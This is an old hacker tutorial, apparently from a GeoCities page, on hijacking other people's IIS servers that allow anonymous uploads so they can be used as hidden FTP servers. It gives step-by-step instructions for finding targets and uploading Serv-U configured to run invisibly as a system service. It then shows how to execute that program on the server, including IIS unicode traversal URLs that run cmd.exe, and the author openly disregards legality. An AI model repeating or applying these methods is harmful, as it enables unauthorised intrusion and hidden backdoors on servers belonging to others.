Pub Haxoring ***Private*** Tutorial

			 	(C) WX2 Productions

Note:
I don't care what you do with this information, and I don't care if 
you go to jail.  If you have no idea what this is about then you shouldn't 
be reading it anyways.  Like... if you don't no what a pub is then stop
reading right now.... and since this is the private version I sure hope
you no what a pub is

Requirements:
Firstly, if you are reading this 'private' version you should understand
that you may ***not*** distribute it in any way, if you do and if i 
catch you you will pay  ;)
Secondly, to find pubs that you can haxor you are going to need a big list 
of pubs.  To get these you can use programs like grim's ping, or for you
more advanced people, an IIS scanning program.
Thirdly, you will probably want some proxies to use.  If you use grims
ping to scan you should be able to find a ton of wingates.  And you can
find http proxies anywhere.

Serv-U set-up:
I like 2.5 and think that 3.0 is evil, but use whatever works for you.  
You'll want it 2 run 'hidden' , in 3.0 that is easy than 2.5, but 3.0 
is evil ;)  You will want it running on a port other than 21, maybe 
say port 1023.  When you set it up, just like install it on your comp,
and do all the settings that way.  You will want to set it to run as
a system service, and you'll want 'invisible mode'.  In servu 2.5:

StartIconic=Yes
StartMaximized=No
Invisible=Yes

should be in your serv-u.ini file.  If not, add them.  In servu 3.0:
just make sure you only upload the servudaemon.exe and the
servudaemon.ini filez.  Then it will automatically run 'hidden'

Haxoring
----------

First step:
The first thing to do once you have a big list of pubs is to put all their
ip's in your browser.  If a site loads (even an under construction page)
then itz a possible choice.  If nothing loads then move on.

Second step:
Once you find a pub that also has a web site running on the same computer
connect to it.  If when you connect you see some html filez like main.htm
and index.html and maybe a default.asp, then you have a good chance of
being able to haxor this site.  Make sure you have upload permission by
uploading a tmp file.  If it works move on to step 3.  If not, then look
around and see if you can find other folders that have html content that
you can upload to.  If you see no folders with html stuff in them, or
you have no upload permission, then you are going to have to try another 
one. (See advanced techniques for other ways to do this)

Third step:
Upload space.asp (it comes with grims ping) and try and load it off
their website (http://1.2.3.4/space.asp).  If it loads, you will
get a listing of their HD space.  If not, your last hope will be
the IIS hak in advanced techniques.

Fourth step:
Upload serv-u (serv-u.exe and serv-u.ini or servudaemon.exe and 
servudaemon.ini) to the folder you found in step 2.  Now go to your
browser and type in 'http://1.2.3.4/serv-u.exe' where 1.2.3.4 is the ip of
the site you are haxoring.  If it just goes for a long time and nothing
seems to happen go back to your ftp program and try connecting to the 
port you set serv-u to run on.  If you connect, then you've successfully
haxored that pub  =)  If not... what might happen is once you type in the
servu.exe it might think you want to download it and try and send it to you.
There is ways around this, see advanced techniques for more info


Advanced Techniques:
| IIS hacks |
Say you find a web site, and you can only upload to the 'Imcoming' folder.
This is pretty useless if you are trying to haxor a pub right? or is it?
There are a few IIS unicode haks, i'll put one in here (because itz the only
one i know really well).

You can get the whole exploit here: 
http://newdata.box.sk/2001/jul/unicode1.txt , but i'll summerize it here.
Take the website (for this example it'll be 1.2.3.4), and put this in 
you browser:
http://1.2.3.4/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
If it werks you will get a listing of their C:\ drive.  If not you
will get an error.  To run stuff use this URL:
http://1.2.3.4/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+call+c:\seru.exe
I think now you get the picture and can go from here  =)

| ASP file stuff |
It runs space.asp nicely, but you've uploaded servu, but when you go to run it,
it just tries to d/l it to you.  You've also tried the IIS hack, but it doesn't 
werk.  You are so close, but not quite there.  Thats what the ASP file hack is
for.  Basically if it will run .asp scripts then you can just make a .asp script
that will run servu for you.  You will need to know the 'real' path to it, but
you can get that with an .asp file too.  I have 2 .asp files that are mad just 
for this, if you need them just ask (see contact information).

Well... that is basically it.  You now have a nicely haxored pub.  You may want 
to move the servu.exe somewhere else on their HD say in the winnt folder, and 
run it again from there.


Contact Information:
If you know where to contact me, feel free to contact me.  If not, then to
bad.

Have fun
<!-- following code added by server. PLEASE REMOVE -->
<!-- preceding code added by server. PLEASE REMOVE --><!-- text below generated by server. PLEASE REMOVE --></object></layer></div></span></style></noscript></table></script></applet><script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script language="JavaScript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/smb/js/hosting/cp/js_source/geov2_001.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.geocities.yahoo.com/visit.gif?us1241050663" alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001086&t=1241050663&f=us-w1" ALT=1 WIDTH=1 HEIGHT=1>